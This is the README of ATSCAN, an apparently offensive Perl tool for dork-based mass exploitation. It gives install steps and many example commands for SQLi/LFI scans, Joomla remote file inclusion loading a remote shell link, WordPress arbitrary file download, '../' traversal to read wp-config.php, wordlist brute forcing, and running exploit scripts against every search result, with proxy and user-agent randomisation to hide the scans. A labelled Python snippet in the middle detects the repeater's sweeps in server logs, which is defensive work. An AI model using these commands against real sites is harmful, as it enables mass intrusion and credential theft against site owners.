ATSCAN SCANNER

Advanced Search / Dork / Mass Exploitation Scanner 

Description

● Search engine Google / Bing / Ask / Yandex / Sogou
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● External command execution.
● XSS / SQLI / LFI / AFD scanner.
● Filter WordPress and Joomla sites on the server.
● Find Admin page.
● Decode / Encode Base64 / MD5
● Ports scan.
● Extract IPs
● Extract E-mails.
● Auto-detect errors.
● Auto-detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● And more…

CHANGES: v16.0.1 17/02/2019

  • Add target vulnerability for Shodan scan.
  • Add Shodan honeypot score.

Installation

git clone https://github.com/AlisamTechnology/ATSCAN 
cd ATSCAN 
chmod +x ./install.sh 
./install.sh
chmod +x ./atscan.pl

Usage

--help / -h / -?    Help.
--proxy             Set tor proxy for scans [EX: --proxy "socks://localhost:9050"]
                    Set proxy [EX: --proxy "http://12.45.44.2:8080"]
                    Set proxy list [EX: --proxy list.txt]
-m                  Set search engines (default: Bing) EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
--proxy-random      Random proxy [EX: --proxy-random list.txt or --proxy-random "socks://localhost:9050"]
--m-random          Random choice among all available engines
--b-random          Random choice among all available user agents
--freq              Random time frequency (in seconds)
--time              Set browser timeout
--dork / -d         Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
-t                  Target
--level / -l        Scan level (approximate number of result pages to scan)
-p                  Set test parameter EX: id,cat,product_ID
--save / -s         Output.
--content           Print request content
--data              Post and Get forms. See examples
--post              Use POST method
--get               Use GET method
--header            Set headers
--host              Domain name [Ex: site.com]
--nobanner          Hide tool banner
--beep              Produce beep sound if positive scan found.
--ifend             Produce beep sound when scan process is finished.
--noinfo            Skip extra results info.
--noping            No host ping.
--limit             Limit max positive scan results.
--valid / -v        Validate by string
--status            Validate by HTTP header status
--ifinurl           Get targets with exact string matching
--sregex            Get targets with exact regex matching
--none              Get negative validation or engine regex matching
--notin             Get targets where string does not exist in HTML
--unique            Get targets with exact dork matching
--replace           String to replace
--with              String to replace with
--full              --replace --full will replace all URL parameters from string to the end
--payload           Use your own payloads instead of tool ones
--exp / -e          Exploit/Payload will be added to full target
--expHost           Exploit will be added to the host
--expIp             Exploit will be added to the host IP
--sql               Xss scan
--lfi               Local file inclusion
--joomrfi           Scan for Joomla local file inclusion.
--shell             Shell link [Ex: http://www.site.com/shell.txt]
--wpafd             Scan WordPress sites for arbitrary file download
--admin             Get site admin page
--shost             Get site subdomains
--tcp               TCP port
--udp               UDP port
--sites             Sites in the server
--wp                WordPress sites in the server
--joom              Joomla sites in the server
--upload            Get sites with upload files in the server
--zip               Get sites with zip files in the server
--md5               Convert to MD5
--encode64          Encode base64 string
--decode64          Decode base64 string
--TARGET            Will be replaced by target in external command
--HOST              Will be replaced by host in external command
--HOSTIP            Will be replaced by host IP in external command
--PORT              Will be replaced by open port in external command
--ip                Crawl to get IPs
--regex             Crawl to get strings matching regex
--noquery           Remove string value from query URL [ex: site.com/index.php?id=string]
--command / -c      External command to execute
--email             Get emails
rang(x-y)           EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql
                    site.com/index.php?id=1 -> 9.
repeat(txt-y)       EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t "site.com/index.php?id=../wp-config.php"
                    In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER]             To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
[DATA/DATAFILE]     To separate data values ex: --data "name:username [DATA]email:xxxxxx [DATA]pass:xxxxx/[DATAFILE]pass:file.txt"
--update            Update tool
--tool              Tool info.
--config            User configuration.
--pass              Set a password for tool use.
--uninstall         Uninstall tool.

● PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080
or --proxy list.txt Ex: --proxy my_proxies.txt

● RANDOM:
Random proxy: --proxy-random [proxy list.txt]
Random browser: --b-random
Random engine: --m-random

● SET HEADERS:
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"
atscan -t target --data "name:userfile[DATAFILE]value:file.txt" --post --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"

● SEARCH ENGINE:
Search: atscan --dork [dork] --level [level]
Search: atscan -d [dork] -l [level]
Set engine: atscan --dork [dork] --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Set selective engines: atscan -d [dork] -l [level] -m 1,2,3..
Search with many dorks: atscan --dork [dork1 [OTHER]dork2 [OTHER]dork3] --level [level]
Search and rand: atscan -d [dork] -l [level] --expHost "/index.php?id=rang(1-9)" --sql
Get Server sites: atscan -t [ip] --level [value] --sites
Get Server sites: atscan -t "[ip from]-[ip to]" --level [value] --sites
Get Server sites: atscan -t "ip1 [OTHER]ip2" --level [value] --sites
Get Server WordPress sites: atscan -t [ip] --level [value] --wp
Get Server Joomla sites: atscan -t [ip] --level [value] --joom
Get Server upload sites: atscan -t [ip] --level [value] --upload
Get Server zip sites files: atscan -t [ip] --level [value] --zip
WP Arbitrary File Download: atscan -t [ip] --level [value] --wpafd
Joomla RFI: atscan -t [ip] --level [10] --joomrfi --shell [shell link]
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork site:site.com --level [level] --email
Search + get ips: atscan --dork [dork] --level [level] --ip

● REGULAR EXPRESSIONS:
Regex use: atscan [--dork [dork] / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'

● REPEATER:
atscan -t site.com/index.php?id=rang(1-10) --sql
atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql
atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php"
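
On the receiving side, the repeater leaves a recognisable trail in web server logs: one client requesting the same parameter with a growing "../" prefix, or with consecutive integer values. The sketch below is an added detection example, not part of ATSCAN or its documentation; the function names, the run threshold and the sample log lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format, trimmed); not taken from the page.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Feb/2019:10:00:01 +0000] "GET /index.php?id=../wp-config.php HTTP/1.1" 200 512
203.0.113.7 - - [17/Feb/2019:10:00:01 +0000] "GET /index.php?id=../../wp-config.php HTTP/1.1" 200 512
203.0.113.7 - - [17/Feb/2019:10:00:02 +0000] "GET /index.php?id=../../../wp-config.php HTTP/1.1" 200 512
198.51.100.9 - - [17/Feb/2019:10:00:03 +0000] "GET /index.php?id=1 HTTP/1.1" 200 900
198.51.100.9 - - [17/Feb/2019:10:00:03 +0000] "GET /index.php?id=2 HTTP/1.1" 200 900
198.51.100.9 - - [17/Feb/2019:10:00:04 +0000] "GET /index.php?id=3 HTTP/1.1" 200 900
198.51.100.9 - - [17/Feb/2019:10:00:04 +0000] "GET /index.php?id=4 HTTP/1.1" 200 900
192.0.2.44 - - [17/Feb/2019:10:00:05 +0000] "GET /index.php?id=7 HTTP/1.1" 200 900
192.0.2.44 - - [17/Feb/2019:10:00:09 +0000] "GET /css/../img/logo.png HTTP/1.1" 200 300
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"', re.M)
TRAVERSAL = re.compile(r'^((?:\.\./)+)(.*)$', re.S)  # leading "../" run, then the rest

def longest_run(values):
    """Length of the longest n, n+1, n+2, ... run, in request order."""
    best = run = 0
    prev = None
    for v in values:
        run = run + 1 if prev is not None and v == prev + 1 else 1
        best, prev = max(best, run), v
    return best

def detect(log_text, min_run=3):
    """Return sorted (ip, kind, 'path?param=', file) tuples for repeater-like sweeps."""
    seen = defaultdict(list)  # key -> numbers observed, in log order
    for ip, url in LINE.findall(log_text):
        parts = urlsplit(url)
        # parse_qsl percent-decodes, so %2e%2e%2f is counted like "../"
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            where = f"{parts.path}?{name}="
            t = TRAVERSAL.match(value)
            if t:  # repeat(../-N)file pattern: record the traversal depth
                depth = len(t.group(1)) // 3
                seen[(ip, "traversal-depth-sweep", where, t.group(2))].append(depth)
            elif value.isascii() and value.isdigit():  # rang(x-y) pattern
                seen[(ip, "sequential-value-sweep", where, "")].append(int(value))
    return sorted(k for k, nums in seen.items() if longest_run(nums) >= min_run)

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Keying on the client IP alone misses a sweep spread across the proxies of a --proxy-random list, so in practice the same run check is also worth applying per path and parameter across all clients within a short time window.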

● PORTS:
atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your external command"

● ENCODE / DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

● DATA:
Post data: atscan -t [target] --data "field1:value1 [DATA]field2:value2 [DATA]field3:value3" [--post / --get]
Wordlist: atscan -t [target] --data "name:userfile [DATAFILE]value:file.txt" [--post / --get]
atscan -t [target] --data "username:john [DATA]pass:1234" [--post / --get]
Post + Validation: --data "name:userfile [DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]

● EXTERNAL COMMANDS:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET"

● MULTIPLE SCANS:
atscan --dork [dork] --level [10] --sql --lfi --wp ..
atscan --dork [dork] --level [10] --replace [string] --with [string] --exp/--expHost [payload] [--sql / --lfi / --wp /…]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /…]
atscan -t [target] [--sql / --lfi / --wp /…]

● USER PAYLOADS:
atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt]

● SEARCH VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --status [code] --none (Positive when status doesn't match)
atscan -d [dork / dorks.txt] -l [level] --status [code] / -v [string] / --ifinurl [string] / --sregex [regex] --none
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique

● SCAN VALIDATION:
atscan -t [target / targets.txt] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --exp/--expHost [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --full --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --exp/--expHost [payload] --status [code] / --valid [string]
atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]
atscan -t [target / targets.txt] --valid [string] --notin [string]

● UPDATE TOOL:
atscan --update

● UNINSTALL TOOL:
atscan --uninstall

Copyright (c) 2015 Alisam Technology

Source: https://github.com/AlisamTechnology/
